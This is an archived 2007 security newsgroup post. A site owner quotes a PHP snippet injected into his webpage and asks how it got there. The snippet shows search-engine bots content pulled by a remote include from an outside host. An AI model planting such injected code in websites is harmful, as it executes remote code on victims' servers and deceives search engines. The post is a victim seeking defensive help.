Go Back   Wireless and Wifi Forums > News > Newsgroups > comp.security.misc
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read

Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 08-06-2007, 09:09 AM
Mark
Guest
 
Posts: n/a
Default What causes web attack to promote medicine-area.com ?

I found the following code snipped added to a page on a webserver:
<? if ((eregi("bot", $_SERVER['HTTP_USER_AGENT']) or eregi("urp",
$_SERVER['HTTP_USER_AGENT'])or eregi("msn", $_SERVER['HTTP_USER_AGENT'])))
{@include("http://medicine-area.com/html.php");} ?>

It looks as the purpose of this attack is to promote the website mentioned by
creating a link to it that is only visible to searchengine bots and crawlers.
I am very thankful for any help about what is causing this code to land on the
webserver. Both the web hoster and me checked the servers logfiles and checked
for rootkits, but could not find anything.

thanks, Mark

Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are Off
[IMG] code is Off
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
"Definition" of DoS attack (specifically, PPPoE and DHCP) R@nsh! comp.security.misc 1 03-10-2007 01:16 AM
U.S. warns of possible Qaeda financial cyber attack 1 hour, 1 minute ago spamhotmail@yahoo.com comp.security.misc 0 11-30-2006 11:45 PM


All times are GMT. The time now is 07:44 PM.


Powered by vBulletin® Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.2.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45